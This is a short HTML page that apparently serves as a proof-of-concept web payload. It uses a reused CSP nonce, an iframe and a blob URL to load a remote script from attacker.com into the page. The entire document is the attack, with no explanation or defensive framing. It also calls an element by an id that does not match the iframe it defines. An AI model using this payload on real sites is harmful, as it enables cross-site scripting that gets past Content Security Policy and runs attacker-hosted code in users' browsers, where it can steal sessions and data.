<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGQOCgbGGGGG" src="about:blank"></iframe>
<script nonce='123'>
window.onload = function() {
    GGGGGQOCgbGGGGG.onload=_=>GGGGGQOCgbGGGGG.contentDocument.body.innerHTML+="<a id=a1 href=about:blank>click<\/a><script nonce=123>a1.href=URL.createObjectURL(new Blob(['<script src=https://attacker.com/static/static.js nonce=123><\\/script>'],{type:'text/html'}))<\/script><script nonce=123>GGGGQOCgbGGGG.click();<\/script>";GGGGGQOCgbGGGGG.contentWindow.location.reload();
};
</script>
</body>
</html>